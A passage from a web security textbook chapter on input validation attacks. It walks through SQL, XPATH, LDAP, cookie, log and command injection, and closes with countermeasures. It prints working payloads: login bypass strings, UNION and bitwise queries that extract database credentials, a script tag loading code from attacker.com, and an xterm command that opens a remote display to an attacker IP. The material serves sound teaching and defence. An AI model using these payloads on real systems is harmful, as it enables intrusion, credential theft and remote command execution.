The use of string concatenation to create queries is one of the root causes of SQL injection. When a parameter’s value is placed directly into the string, an attacker can easily inject malicious input to alter the behavior of the query. So, instead of creating a valid query with a numeric argument as shown here,

   SELECT tsk.TaskID, tsk.Title, tsk.Comments FROM tblTask tsk
   WHERE tsk.TaskID = 1 AND tsk.Active <> 0 AND tsk.Archive = 0

the attacker disrupts the syntax by introducing an unmatched quote character:

   SELECT tsk.TaskID, tsk.Title, tsk.Comments FROM tblTask tsk
   WHERE tsk.TaskID = 1' AND tsk.Active <> 0 AND tsk.Archive = 0

The incorrect syntax creates an error, which is often transmitted back to the user’s web browser. A common error message looks like this:

   [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax...

Inserting a single quote and generating an error won’t reveal passwords or enable the attacker to bypass access restrictions, but it’s often a prerequisite. Of course, this technique relies on the fact that the application will return some sort of message to indicate a database error occurred. Table 6-1 lists some common error strings produced by databases. This list is by no means comprehensive, but it should give you an idea of what errors look like. In many cases, the actual SQL statement accompanies the error message. Also note that these errors range across database platform and development language.

Finally, some errors occur in the application layer before a statement is constructed or a query is sent to the database. Table 6-2 lists some of these error messages. Distinguishing the point where an error occurs is important. The threat to an application differs greatly between an attack that generates a parsing error (such as trying to convert a string to an integer) and an attack that can rewrite the database query.

Any dynamic data that the user can modify represents a potential attack vector. Keep in mind that cookie values should be tested just like other parameters. Figure 6-2 shows

Image

Table 6-1 Common Database Error Messages

an error when a single quote is appended to a cookie value for a very old version of phpBB.

Now that we’ve determined how to find a SQL injection vulnerability, it’s time to determine the vulnerability’s impact on the application’s security. It’s one thing to produce an error by inserting a single quote into a cookie value or substitute a POST parameter with a MOD () function; it’s another thing to be able to retrieve arbitrary information from the database.

Databases store information, so it’s no surprise that targeting data with an attack is probably the first thing that comes to mind. However, if we can use SQL injection to change the logic of a query, then we could possibly change a process flow in the application. A good example is the login prompt. A database-driven application may use a query similar to the following example to validate a username and password from a user.

   SELECT COUNT(ID) FROM UserTable WHERE UserId='+ strUserID +
   ' AND Password=' + strPassword + '

Image

Table 6-2 Common Parsing Errors

Image

Figure 6-2 Verbose error due to an unexpected cookie value

If the user supplies arguments for the UserId and Password that match a record in the UserTable, then the COUNT (ID) will be equal to one. The application will permit the user to pass through the login page in this case. If the COUNT (ID) is NULL or zero, then that means the UserId or Password is incorrect and the user will not be permitted to access the application.

Now, imagine if no input validation were performed on the username parameter. We could rewrite the query in a way that will ensure the SELECT statement succeeds—and only needs a username to do so! Here’s what a modified query looks like:

   SELECT COUNT(ID) FROM UserTable WHERE UserId='mike'-- ' AND Password=''

Notice that the username includes a single quote and a comment delimiter. The single quote correctly delineates the UserId (mike) and the double dash followed by a space represents a comment, which means everything to the right is ignored. The username would have been entered into the login form like this:

   mike'--%20

In this way, we’ve used SQL injection to alter a process flow in the application rather than try to retrieve some arbitrary data. This attack might work against a login page to allow us to view the profile information for a user account or bypass access controls. Table 6-3 lists some other SQL constructs that you can try as part of a parameter value. These are the raw payloads; remember to encode spaces and other characters so their meaning is not changed in the HTTP request. For example, spaces can be encoded with %20 or the plus symbol (+).

Image

Table 6-3 Characters to Modify a Query

Since databases contain the application’s core information, they represent a high-profile target. An attacker who wishes to grab usernames and passwords might try phishing and social engineering attacks against some of the application’s users. On the other hand, the attacker could try to pull everyone’s credentials from the database.

ImageSubqueries

Subqueries can retrieve information ranging from Boolean indicators (whether a record exists or is equal to some value) to arbitrary data (a complete record). Subqueries are also a good technique for semantic-based vulnerability identification. A properly designed subquery enables the attacker to infer whether a request succeeded or not.

The simplest subqueries use the logical AND operator to force a query to be false or to keep it true:

   AND 1=1
   AND 1=0

Now, the important thing is that the subquery be injected such that the query’s original syntax suffers no disruption. Injecting into a simple query is easy:

   SELECT price FROM Products WHERE ProductId=5436 AND 1=1

More complex queries that have several levels of parentheses and clauses with JOINs might not be as easy to inject with that basic method. In this case, we alter the approach and focus on creating a subquery from which we can infer some piece of information. For example, here’s a simple rewrite of the example query:

   SELECT price FROM Products WHERE ProductId=(SELECT 5436)

We can avoid most problems with disrupting syntax by using the (SELECT foo) subquery technique and expanding it into more useful tests. We don’t often have access to the original query’s syntax, but the syntax of the subquery, like SELECT foo, is one of our making. In this case, we need not worry about matching the number of opening or closing parentheses or other characters. When a subquery is used as a value, its content is resolved before the rest of the query. In the following example, we try to count the number of users in the default mysql.user table whose name equals “root”. If there is only one entry, then we’ll see the same response as when using the value 5436 (5435+1 = 5436).

   SELECT price FROM Products WHERE ProductId=(SELECT 5435+(SELECT
   COUNT(user) FROM mysql.user WHERE user=0x726f6f74))

This technique could be adapted to any database and any particular SELECT statement. Basically, we just fashion the statement such that it will return a numeric (or true/false) value.

   SELECT price FROM Products WHERE ProductId=(SELECT 5435+(SELECT
   COUNT(*) FROM SomeTable WHERE column=value))

Subqueries can also be further expanded so you’re not limited to inferring the success or failure of a SELECT statement. They can be used to enumerate values, albeit in a slower, roundabout manner. For example, you can apply bitwise enumeration to extract the value of any column from a custom SELECT subquery. This is based on being able to distinguish different responses from the server when injecting AND 1=1 and AND 1=0.

Bitwise enumeration is based on testing each bit in a value to determine if it is set (equivalent to AND 1=1) or unset (equivalent to AND 1=0). For example, here is what bitwise comparison for the letter a (ASCII 0x61) looks like. It would take eight requests to the application to determine this value (in fact, ASCII text only uses seven bits, but we’ll refer to all eight for completeness):

   0x61 & 1 = 1
   0x61 & 2 = 0
   0x61 & 4 = 0
   0x61 & 8 = 0
   0x61 & 16 = 0
   0x61 & 32 = 32
   0x61 & 64 = 64
   0x61 & 128 = 0
   0x61 = 01100001 (binary)

The comparison template for a SQL injection subquery is shown in the following pseudo-code example. Two loops are required: one to enumerate each byte of the string (i) and one to enumerate each bit in the byte (n):

   for i = 1 to length(column result):
   for p = 0 to 7:
   n = 2**p
   AND n IN (SELECT CONVERT(INT,SUBSTRING(column, i,1)) & n FROM clause

This creates a series of subqueries like this:

   AND 1 IN (SELECT CONVERT(INT,SUBSTRING(column,i,1)) & 1 FROM clause
   AND 2 IN (SELECT CONVERT(INT,SUBSTRING(column,i,1)) & 2 FROM clause
   AND 4 IN (SELECT CONVERT(INT,SUBSTRING(column,i,1)) & 4 FROM clause
   ...
   AND 128 IN (SELECT CONVERT(INT,SUBSTRING(column,i,1)) & 128 FROM clause

Finally, this is what a query might look like that enumerates the sa user password from a Microsoft SQL Server database (you would need to iterate n 8 times through each position i 48 times for 384 requests). The sa user is a built-in administrator account for SQL Server databases; think of it like the Unix root or Windows Administrator accounts. So it is definitely dangerous if the sa user’s password can be extracted via a web application. Each time a response comes back that matches the injection of AND 1=1, the bit equals 1 in that position:

   AND n IN
   (
   SELECT CONVERT(INT,SUBSTRING(password,i,1)) & n
   FROM master.dbo.sysxlogins
   WHERE name LIKE 0x73006100
   )

Subqueries take advantage of complex SQL constructs to infer the value of a SELECT statement. They are limited only by internal data access controls and the characters that can be included in the payload.

ImageUNION

The SQL UNION operator combines the result sets of two different SELECT statements. This enables a developer to use a single query to retrieve data from separate tables as one record. The following is a simple example of a UNION operator that will return a record with three columns:

   SELECT c1,c2,c3 FROM table1 WHERE foo=bar UNION
   SELECT d1,d2,d3 FROM table2 WHERE this=that

A major restriction to the UNION operator is that the number of columns in each record set must match. This isn’t a terribly difficult thing to overcome; it just requires some patience and brute-force.

Column undercounts, where the second SELECT statement has too few columns, are easy to address. Any SELECT statement will accept repeat column names or a value. For example, these are all valid queries that return four columns:

   SELECT c,c,c,c FROM table1
   SELECT c,1,1,1 FROM table1
   SELECT c,NULL,NULL,NULL FROM table1

Column overcounts, where the second SELECT statement has too many columns, are just as easy to address. In this case, use the CONCAT() function to concatenate all of the results to a single column:

   SELECT CONCAT(a,b,c,d,e) FROM table1

Let’s take a look at how the UNION operator is used with a SQL injection exploit. It’s only a small step from understanding how UNION works to using it against a web application. First, we’ll verify that a parameter is vulnerable to SQL injection. We’ll do this by appending an alpha character to a numeric parameter. This results in an error like the one in Figure 6-3. Notice that the error provides details about the raw query—most especially the number of columns, 12, in the original SELECT.

We could also have tested for this vulnerability using a “blind” technique by comparing the results of these two URLs:

   http://website/freznoshop-1.4.1/product_details.php?id=43
   http://website/freznoshop-1.4.1/product_details.php?id=MOD(43,44)

An error could also have been generated with this URL (note the invalid use of the MOD() function):

   http://website/freznoshop-1.4.1/product_details.php?id=MOD(43,a)

Image

Figure 6-3 Application error that reveals database fields

In any case, the next step is to use a UNION operator to retrieve some information from the database. The first step is to match the number of columns. We verify the number (12) with two different requests. We’ll continue to use the http://website/freznoshop-1.4.1/ URL. The complete URL is somewhat long when we include the UNION statement. So we’ll just show how the id parameter is modified rather than include the complete URL. We expect that we’ll need 12 columns, but we’ll submit a request with 11 columns to demonstrate an error when the UNION column sets do not match.

   id=43+UNION+SELECT+1,1,1,1,1,1,1,1,1,1,1 /*

Figure 6-4 shows the error returned when this id value is submitted to the application. Note that the error explicitly states an unmatched number of columns.

   id=43+UNION+SELECT+1,1,1,1,1,1,1,1,1,1,1,1/*

If we then modify the id parameter with 12 columns in the right-hand set of UNION, the query is syntactically valid and we receive the page associated with id=43. Figure 6-5 shows the page when no error is present.

Of course, the real reason to use a UNION operator is to retrieve arbitrary data. Up to this point, we’ve only succeeded in finding a vulnerability and matching the number of columns. Since our example application uses a MySQL database, we’ll try to retrieve

Image

Figure 6-4 Using column placeholders to establish a valid UNION query

Image

Figure 6-5 Successful UNION query displays user id.

user credentials associated with MySQL. MySQL stores database-related accounts in a manner different from Microsoft SQL Server, but we can now access the default table names and columns. Notice the response in Figure 6-6. There is an entry in the table that reads 1 .: root—this is the username (root) returned by the UNION query. This is the value submitted to the id parameter:

   id=43+UNION+SELECT+1,cast(user+AS+CHAR(30)),1,1,1,1,1,1,1,1,1,1+FROM+
   mysql.user/*

Of course, there are several intermediate steps necessary to get to the previous value for id. The initial test might start out with one of these entries,

   id=43'
   id=43/*

and then move on to using a UNION statement to extract data from an arbitrary table. In this example, it was necessary to create a SELECT on 12 columns on the right-hand side of the UNION statement in order to match the number of columns on the left-hand side. This number is typically reached through trial and error, e.g., try one column, then two, then three, and so on. Finally, we discovered that the result of the second column would be displayed in the web application, which is why the other columns have 1 as a placeholder.

Image

Figure 6-6 Successful UNION query reveals username.


TIP

The CAST() function was necessary to convert MySQL’s internal storage type (utf8_bin) for the username to the storage type expected by the application (latin1_Swedish_ci). The CAST() function is part of the SQL2003 standard and is supported by all popular databases. It may or may not be necessary depending on the platform.


Like many SQL injection techniques, the UNION operator works best when the parameter’s value is not wrapped by single quotes (as for numeric arguments) or when single quotes can be included as part of the payload. When UNION can be used, the methodology is simple:

• Identify vulnerability.

• Match the number of columns in the original SELECT query.

• Create a custom SELECT query.

Enumeration

All databases have a collection of information associated with their installation and users. Even if the location of application-specific data cannot be determined, there are several tables and other information that can be enumerated to determine versions, patches, and users.

SQL injection is by far the most interesting attack that can be performed against a datastore, but it’s not the only one. Other attacks might take advantage of inadequate security policies in a catalog or table. After all, if you can access someone else’s personal profile by changing a URL parameter from 655321 to 24601, then you don’t need to inject malicious characters or try an alternate syntax.

One of the biggest challenges with applications that rely on database access is how to store the credentials securely. On many platforms, the credentials are stored in a text file that is outside the web document root. Yet, in some cases, the credentials may be hard-coded in an application source file within the web document root. In this latter case, the confidentiality of the username and password relies on preventing unauthorized access to the source code.

SQL Injection Countermeasures

An application’s database contains important information about the application and its users. Countermeasures should address the types of attacks that can be performed against a database as well as minimize the impact of a compromise in case a particular defense proves inadequate.

Filtering user-supplied data is probably the most repeated countermeasure for web applications. Proper input validation protects the application not only from SQL injection, but also from other parameter manipulation attacks as well. Input validation of values destined for a database can be tricky. For example, it has been demonstrated how dangerous a single quote character can be, but then how do you handle a name like O’Berry or any sentence that contains a contraction?

Validation routines for values bound for a database are not much different from filters for other values. Here are some things to keep in mind:

Escape characters Characters such as the single quote (apostrophe) have a specific meaning in SQL statements. Unless you’re using prepared statements or parameterized queries, which prevent the misinterpretation of dangerous characters in SQL statements, 100 percent of the time, make sure to escape such characters (for example, ') to prevent them from disrupting the query. Always do this if you rely on string concatenation to create queries.

Deny characters You can strip characters that you know to be malicious or that are inappropriate for the expected data. For example, an e-mail address only contains a specific subset of punctuation characters; it doesn’t need the parentheses.

Appropriate data types Whenever possible, assign integer values to integer data types and so on for all of the user-supplied data. An attacker might still produce an error, but the error will occur when assigning a parameter’s value and not within the database.

The strongest protection is provided when properly using parameterized queries (also known as prepared statements). The following code exemplifies one way to implement a parameterized query in an application:

   SqlConnection conn = new SqlConnection(connectionString);
   conn.Open();
   string s = "SELECT email, passwd, login_id, full_name " +
     "FROM members WHERE email = @email";
   SqlCommand cmd = new SqlCommand(s);
   cmd.Parameters.Add("@email", email);
   SqlDataReader reader = cmd.ExecuteReader();

In addition to being more secure, the parameterized code offers performance benefits, including fewer string concatenations, no manual string escapes, and depending on the DBMS in use, the query may potentially be hashed and stored for precompiled execution.

One of the most devastating attacks against a web application is a successful SQL injection exploit. These attacks drive to the source of the data manipulated by the application. If the database can be compromised, then an attacker may not need to try brute-force attacks, social engineering, or other techniques to gain unauthorized access and information. It is important to understand how these vulnerabilities can be identified. Otherwise, countermeasures that work against one type of attack may not work against another. In the end, the best defense is to build queries with bound parameters (parameterized statements or prepared statements) in the application and rely on stored procedures in the database where possible.

XPATH Injection

In addition to storing data in an RDBMS, web applications also commonly store data in an XML format. XPATH is the query language used to parse and extract specific data out of XML documents, and by injecting malicious input into an XPATH query, we can alter the logic of the query. This attack is known as XPATH injection. The following example demonstrates how text can be retrieved from a specific element in an XML document using XPATH queries.

Given the XML document:

   <?xml version="1.0" encoding="ISO-8859-1"?>
    <users>
    <admins>
    <user>admin</user>
    <pass>admin123</pass>
    </admins>
    <basic>
    <user>guest</user>
    <pass>guest123</pass>
    </basic>
    </users>

and using this document and executing the following code:

   Set xmlDoc=CreateObject("Microsoft.XMLDOM")
   xmlDoc.async="false"
   xmlDoc.load("users.xml")
   xmlobject.selectNodes("/users/admins/pass/text()")

the result from the query /users/admins/pass will be admin123.

With this in mind, an attacker can abuse XPATH queries that utilize unvalidated input. Unlike SQL injection, there is no way to comment out parts of the query when using XPATH. Therefore, an attacker must inject additional logic into the query, causing it to return true when it otherwise may have returned false or causing it to return additional data. A dangerous example of how an XPATH injection could be used to bypass authentication is based on the following code:

   String(//users/admins/[user/text()=' " + txtUser.Text + " '
   and pass/text()=' "+ txtPass.Text +" '])

If the input is admin' or 1=1 or 'a'='b', the query will be:

   String(//users/admins/[user/text()='admin' or 1=1 or 'a'='b'
   and pass/text()=''])

The expression

   user='admin' or 1=1 or 'a'='b' and pass/text()=' '

can be represented as

   (A OR B) OR (C AND D)

The logical operator AND has higher priority than OR, so if either A or B is true, the expression will evaluate to true irrespective of what (C AND D) returns. If the user input for the query, B is 1=1, which is always true, it makes the result of (A OR B) true. Thus the query returns true and the attacker is able to log in—bypassing the authentication mechanism with XPATH injection.

ImageXPATH Injection Countermeasures

Like SQL injection, XPATH injection can be prevented by employing proper input validation and parameterized queries. No matter what the application, environment, or language, you should follow these best practices:

• Treat all input as untrusted, especially user input, but even input from your database or the supporting infrastructure.

• Validate not only the type of data but also its format, length, range, and type (for example, a simple regular expression such as (/^"*^';&<>()/) would find suspect special characters).

• Validate data both on the client and the server because client validation is extremely easy to circumvent.

• Test your applications for known threats before you release them.

Unlike database servers, XPATH does not support the concept of parameterization. However, parameterization can be mimicked with APIs such as XQuery. The XPATH query can be parameterized by storing it in an external file:

   declare variable $user as xs:string external;
   declare variable $pass as xs:string external;//users/user[@user=
   $user and @password=$pass]

The XQuery code would then look like:

   Document doc = new Builder().build("users.xml");
   XQuery xquery = new XQueryFactory().createXQuery(new File("
   dologin.xq"));
   Map vars = new HashMap();
   vars.put("user", "admin");
   vars.put("pass", "admin123");
   Nodes results = xquery.execute(doc, null, vars).toNodes();
   for (int i=0; i < results.size(); i++) {
       System.out.println(results.get(i).toXML());
   }

And XQuery would populate the XPATH code with

   "//users/admins/[user/text()=' " + user + " ' and pass/text()='
   "+ pass +" ']"

This technique provides solid protection from XPATH injection, although it is not built in to the XPATH specification. The user input is not directly used while forming the query; rather, the query evaluates the value of the element in the XML document, and if it does not match the parameterized value, it fails gracefully. It is possible to extract an entire XML document through a web application that is vulnerable to XPATH injection attacks. With the increased adoption of techniques such as Ajax, RIA platforms such as FLEX, or Silverlight, as well as the adoption of XML services from organizations such as Google that rely heavily on the use of XML for everything from communication with backend services to persistence, now more than ever, we need to remain vigilant about the threats and risks created by these approaches.

LDAP Injection

Another data store that should only accept validated input from an application is an organization’s X.500 directory service, which is commonly queried using the Lightweight Directory Access Protocol (LDAP). An organization allowing unvalidated input in the construction of an LDAP query is exposed to an attack known as LDAP injection. The threat posed allows an attacker to extract important corporate data, such as user account information, from the LDAP tree. By manipulating the filters used to query directory services, an LDAP injection attack can wreak havoc on single sign-on environments that are based on LDAP directories. Consider a site that allows you to query the directory services for an employee’s title and employs a URL such as:

   http://www.megacorp.com/employee.asp?user=jwren

Assume the code behind this page doesn’t validate the input:

   <%@ Language=VBScript %>
   <%
   Dim userName
   Dim filter
   Dim ldapObj
   userName = Request.QueryString("user")
   filter = "(uid=" + CStr(userName) + ")"

   Set ldapObj = Server.CreateObject("IPWorksASP.LDAP")
   ldapObj.ServerName = LDAP_SERVER
   ldapObj.DN = "ou=people,dc=megacorp,dc=com"

   ldapObj.SearchFilter = filter

   ldapObj.Search

   While ldapObj.NextResult = 1
   Response.Write("<p>")

   Response.Write("<cTypeface:Bold><u>User information for: " +
   ldapObj.AttrValue(0) + "</u></b><br>")
   For i = 0 To ldapObj.AttrCount -1
   Response.Write("<cTypeface:Bold>" + ldapObj.AttrType(i) +"</b>: " +
   ldapObj.AttrValue(i) + "<br>" )
   Next
   Response.Write("</p>")
   Wend
   %>

Imagine a scenario where a malicious user sends a request to this URL:

   http://www.megacorp.com/employee.asp?user=*

This application will display all of the user information in the response to the request that contains * in the user parameter. Another example of inputting * for the username may result in the application returning an error message that says the password is expired. By inputting parentheses (), the whole LDAP query is revealed in the error message shown here:

   (&(objectClass=User)(objectCategory=Person)(SamAccountName=
   <username... this is where an attacker could start injecting new filters>)

With this information disclosed, an attacker can see how to concatenate filters onto the query. However, data extraction may only be possible through blind LDAP injection attacks due to the AND query. More information on blind LDAP injection attacks is available in the “References & Further Reading” section at the end of this chapter.

LDAP directory services are critical repositories for managing an organization’s user data. If a compromise were to occur, personally identifiable information will almost certainly be exposed and may allow for successful authentication bypass attacks. Be sure to review all user input that interacts with LDAP directory services.

Custom Parameter Injection

When applications employ custom delimiters or proprietary formats in a web application’s parameters, they’re still subject to injection attacks. An attacker simply needs to determine the pattern or appropriate sequence of characters to tamper with the parameter. An application that utilizes custom parameters when storing information on the user’s access privileges is exposed to this type of parameter injection with the consequence of escalated privileges. A real-world example of this can be found in cookies that store sequences of user data like this:

   TOKEN^2|^399203|^2106|^2108|^Admin,0|400,Jessica^202|13197^203|15216

In this case the ^ character indicates the start of a parameter and the | character indicates the end. Although this application has custom code to parse these parameters on the backend, it is susceptible to attackers sending their own values for these parameters to alter the application’s behavior. In the previous example, an attacker may try to alter the corresponding Admin value from a 0 to a 1 in an attempt to gain Admin privileges, as would be possible when the following code is used:

   int admin = 0;
   string token = Request.Cookie["TOKEN"];
   ' Custom cookie parsing logic
   if (admin = 1){
   ' Set user role to administrator
   }

After tampering with the custom parameters in the TOKEN cookie, a malicious user will perform differential analysis on the resulting application behavior to determine if the tampering was effective. An attacker may attempt to change the name from Jessica to another username to determine if that changes the displayed welcome message. For instance:

   Welcome, Jessica

may be altered to

   Welcome, <script src="http://attacker.com/malcode.js">

Custom parameter injection may be leveraged to launch other injection attacks on an application as well. The same rules of proper input validation need to be applied to custom parsing code throughout an application. Be sure to review the rules applied through proper format, type, length, and range checks. Otherwise, the application may fall victim to an unexpected custom parameter injection, in which the risk is as high as the level of sensitivity of the data handled by the custom parser.

Log Injection

Developers need to consider the risk of reading and writing application logs if they’re not sanitizing and validating input before it reaches the log. Logs that are susceptible to injection may have been compromised by a malicious user to cover the tracks of a successful attack with misleading entries. This is also known as a repudiation attack. An application that does not securely log users’ actions may be vulnerable to users disclaiming an action. Imagine an application that logs requests in this format:

   Date, Time, Username, ID, Source IP, Request

The parameters come directly from the request with no input validation:

   Cookie: PHPSESSID=pltmp1obqfig09bs9gfeersju3; username=sdr; id=Justin

An attacker may then modify the id parameter to fill the log with erroneous entries:

   Cookie: PHPSESSID=pltmp1obqfig09bs9gfeersju3; username=sdr; id=
   [FAKE ENTRY]

On some platforms, if the log does not properly escape null bytes, the remainder of a string that should be logged may not be recorded. For instance:

   Cookie: PHPSESSID=pltmp1obqfig09bs9gfeersju3; username=sdr; id=%00

may result in that individual log entry stopping at the id field:

   Date, Time, Username, ...

A real-world example of log injection occurred with the popular SSHD monitoring tool DenyHosts. DenyHosts monitors SSH logs and dynamically blocks the source IP address of a connection that produces too many authentication failures. Version 2.6 is vulnerable to a log injection attack that can lead to a denial of service (DoS) of the SSH service. Because users are allowed to specify the username that gets logged, an attacker can specify any user he or she wants into the /etc/hosts.deny file, which controls access to SSH. By specifying all users, the attacker creates a complete lockdown of the SSH service on the machine, preventing any one outside the box from connecting. More information on this log injection vulnerability can be found at http://www.ossec.net/main/attacking-log-analysis-tools.

All logs and monitoring systems should require strict validation to prevent an attack that truncates entries leading to information loss. The most serious type of log injection attacks would allow the system used to monitor the logs to be compromised, making incident response especially difficult if there is no evidence of what types of attacks were performed.

Command Execution

Many attacks only result in information disclosure such as database columns, application source code, or arbitrary file contents. Command execution is a common goal for an attack because command-line access (or a close equivalent) quickly leads to a full compromise of the web server and possibly other systems on its local network.

ImageNewline Characters

The newline character, %0a in its hexadecimal incarnation, is a useful character for arbitrary command execution. On Unix systems, less secure CGI scripts (such as any script written in a shell language) will interpret the newline character as an instruction to execute a new command.

For example, the administration interface for one service provider’s banking platform is written in the Korn Shell (ksh). One function of the interface is to call an internal “analyze” program to collect statistics for the several dozen banking web sites it hosts. The GET request looks like URL/analyze.sh?-t+24&-i. The first test is to determine if arbitrary variables can be passed to the script. Sure enough, URL/analyze.sh?-h returns the help page for the “analyze” program. The next step is command execution: URL/analyze.sh?-t%0a/bin/ls%0a. This returns a directory listing on the server (using the ls command). At this point, we have the equivalent of command-line access on the server. Keep in mind, however, that the level of access gained is only equivalent to the privileges that have been accorded to the shell script.

ImageAmpersand, Pipe, and Semicolon Characters

One of the important techniques in command injection attacks is finding the right combination of command separation characters. Both Windows and Unix-based systems accept some subset of the ampersand, pipe, and semicolon characters.

The pipe character (| or URL-encoded as %7c) can be used to chain both Unix and Windows commands. The Perl-based AWStats application (http://awstats.sourceforge.net/) provides a good example of using pipe characters with command execution. Versions of AWStats below 6.5 are vulnerable to a command injection exploit in the configdir parameter of the awstats.pl file. The following is an example of the exploit syntax:

   http://website/awstats/awstats.pl?configdir=|command|

where command may be any valid Unix command. For example, you could download and execute exploit code or use netcat to send a reverse shell. The pipe characters are necessary to create a valid argument for the Perl open() function used in the awstats .pl file.

The semicolon (; or URL-encoded as %3b) is the easiest character to use for command execution on Unix systems. The semicolon is used to separate multiple commands on a single command line. The ampersand (& or URL-encoded as %26) does the same on Windows. Thus, this character sometimes tricks Unix-based scripts. The test is executed by appending the semicolon, followed by the command to run, to the field value. For example:

   command1; command2; command3

The next example demonstrates how modifying an option value in the drop-down menu of a form leads to command execution. Normally, the application expects an eight-digit number when the user selects one of the menu choices in the arcfiles.html page. The page itself is not vulnerable, but its HTML form sends POST data to a CGI program named view.sh. The “.sh” suffix sets off the input validation alarms, especially command execution, because Unix shell scripts are about the worst choice possible for a secure CGI program. In the HTML source code displayed in the user’s browser, one of the option values appears as:

   <option value = "24878478" > Acme Co.

The form method is POST. We could go through the trouble of setting up a proxy tool like Paros and modifying the data before the POST request reaches the server. However, we save the file to our local computer and modify the line to execute an arbitrary command (the attacker’s IP address is 10.0.0.42). Our command of choice is to display a terminal window from the web server onto our own client. Of course, both the client and server must support the X Window System. We craft the command and set the new value in the arcfiles.html page we have downloaded on our local computer:

   <option value = "24878478; xterm -display 10.0.0.42:0.0" > Acme Co.

Next, we open the copy of arcfiles.html that’s on our local computer and select “Acme Co.” from the drop-down menu. The Unix-based application receives the eight-digit option value and passes it to the view.sh file, but the argument also contains a semicolon. The CGI script, written in a Bourne shell, parses the eight-digit option as normal and moves on to the next command in the string. If everything goes as planned, an xterm pops up on the console and you have instant command-line access on the victim machine.

The ampersand character (& or URL-encoded as %26) can also be used to execute commands. Normally, this character is used as a delimiter for arguments on the URL. However, with simple URL encoding, ampersands can be submitted within variables. Big Brother, a shell-based application for monitoring systems, has had several vulnerabilities. Bugtraq ID 1779 describes arbitrary command execution with the ampersand character.

Encoding Abuse

As we noted in Chapter 1, URL syntax is defined in RFC 3986 (see “References & Further Reading” for a link). The RFC also defines numerous ways to encode URL characters so they appear radically different but mean exactly the same thing. Attackers have exploited this flexibility frequently over the history of the Web to formulate increasingly sophisticated techniques for bypassing input validation. Table 6-4 lists the most common encoding techniques employed by attackers along with some examples.

PHP Global Variables

The overwhelming majority of this chapter presents techniques that are effective against web applications regardless of their programming language or platform. Different application technologies are neither inherently more secure nor less secure than their

Image

Table 6-4 Common URL Encoding Techniques Used by Attackers

peers. Inadequate input validation is predominantly an issue that occurs when developers are not aware of the threats to a web application or underestimate how applications are exploited.

Nevertheless, some languages introduce features whose misuse or misunderstanding contributes to an insecure application. PHP has one such feature in its use of superglobals. A superglobal variable has the highest scope possible and is consequently accessible from any function or class in a PHP file. The four most common superglobal variables are $_GET, $_POST, $_COOKIE, and $_SESSION. Each of these variables contains an associative array of parameters. For example, the data sent via a form POST are stored as name/value pairs in the $_POST variable. It’s also possible to create custom superglobal variables using the $GLOBALS variable.

A superglobal variable that is not properly initialized in an application can be overwritten by values sent as a GET or POST parameter. This is true for array values that are expected to come from user-supplied input, as well as values not intended for manipulation. For example, a config array variable might have an entry for root_dir. If config is registered as a global PHP variable, then it might be possible to attack it with a request that writes a new value:

   http://www.website.com/page.php?config[root_dir]=/etc/passwd%00

PHP will take the config[root_dir] argument and supply the new value—one that was surely not expected to be used in the application.

Determining the name of global variables without access to source code is not always easy; however, other techniques rely on sending GET parameters via a POST (or vice versa) to see if the submission bypasses an input validation filter.

More information is found at the Hardened PHP Project site, http://www.hardenedphp.net/. See specifically http://www.hardened-php.net/advisory_172005.75.html and http://www.hardened-php.net/advisory_202005.79.html.

Common Side-effects

Input validation attacks do not have to result in application compromise. They can also help identify platform details from verbose error messages, reveal database schema details for SQL injection exploits, or merely identify whether an application is using adequate input filters.

Verbose Error Messages

This is not a specific type of attack but will be the result of many of the aforementioned attacks. Informational error messages may contain complete paths and filenames, variable names, SQL table descriptions, servlet errors (including which custom and base servlets are in use), database errors, or other information about the application and its environment.

COMMON COUNTERMEASURES

We’ve already covered several countermeasures during our discussion of input validation attacks. However, it’s important to reiterate several key points to stopping these attacks:

Use client-side validation for performance, not security. Client-side input validation mechanisms prevent innocent input errors and typos from reaching the server. This preemptive validation step can reduce the load on a server by preventing unintentionally bad data from reaching the server. A malicious user can easily bypass client-side validation controls, so they should always be complemented with server-side controls.

Normalize input values. Many attacks have dozens of alternate encodings based on character sets and hexadecimal representation. Input data should be canonicalized before security and validation checks are applied to them. Otherwise, an encoded payload may pass a filter only to be decoded as a malicious payload at a later step. This step also includes measures taken to canonicalize file- and pathnames.

Apply server-side input validation. All data from the web browser can be modified with arbitrary content. Therefore, proper input validation must be done on the server, where it is not possible to bypass validation functions.

Constrain data types. The application shouldn’t even deal with data that don’t meet basic type, format, and length requirements. For example, numeric values should be assigned to numeric data structures and string values should be assigned to string data structures. Furthermore, a U.S. ZIP code should not only accept numeric values, but also values exactly five-digits long (or the “ZIP plus four” format).

Use secure character encoding and “output validation.” Characters used in HTML and SQL formatting should be encoded in a manner that will prevent the application from misinterpreting them. For example, present angle brackets in their HTML-encoded form (&lt; and &gt;). This type of output validation or character reformatting serves as an additional layer of security against HTML injection attacks. Even if a malicious payload successfully passes through an input filter, then its effect is negated at the output stage.

Make use of white lists and black lists. Use regular expressions to match data for authorized or unauthorized content. White lists contain patterns of acceptable content. Black lists contain patterns of unacceptable or malicious content. It’s typically easier (and better advised) to rely on white lists because the set of all malicious content to be blocked is potentially unbounded. Also, you can only create blacklist patterns for known attacks; new attacks will fly by with impunity. Still, having a black list of a few malicious constructs like those used in simple SQL injection and cross-site scripting attacks is a good idea.


TIP

Some characters have multiple methods of reference (so-called entity notations): named, decimal, hexadecimal, and UTF-8 (Unicode); for more on entity encoding as it relates to browser security see http://code.google.com/p/browsersec/wiki/Part1#HTML_entity_encoding.


Securely handle errors. Regardless of what language is used to write the application, error handling should follow the concept of try, catch, finally exception handling. Try an action; catch specific exceptions that the action may cause; finally exit nicely if all else fails. This also entails a generic, polite error page that does not contain any system information.

Require authentication. In some cases, it may make sense to configure the server to require proper authentication at the directory level for all files within that directory.

Use least-privilege access. Run the web server and any supporting applications as an account with the least permissions possible. The risk to an application susceptible to arbitrary command execution that cannot access the /sbin directory (where many Unix administrator tools are stored) is lower than a similar application that can execute commands in the context of the root user.

SUMMARY

Malicious input attacks target parameter values that the application does not adequately parse. Inadequate parsing may be due to indiscriminate acceptance of user-supplied data, reliance on client-side validation filters, or an expectation that nonform data will not be manipulated. Once an attacker identifies a vector, then a more serious exploit may follow. Exploits based on poor input validation include buffer overflows, arbitrary file access, social engineering attacks, SQL injection, and command injection. Input validation routines are no small matter and are ignored at the application’s peril.

Here are some vectors for discovering inadequate input filters:

• Each argument of a GET request

• Each argument of a POST request

• Forms (e-mail address, home address, name, comments)

• Search fields

• Cookie values

• Browser environment values (user agent, IP address, operating system, etc.)

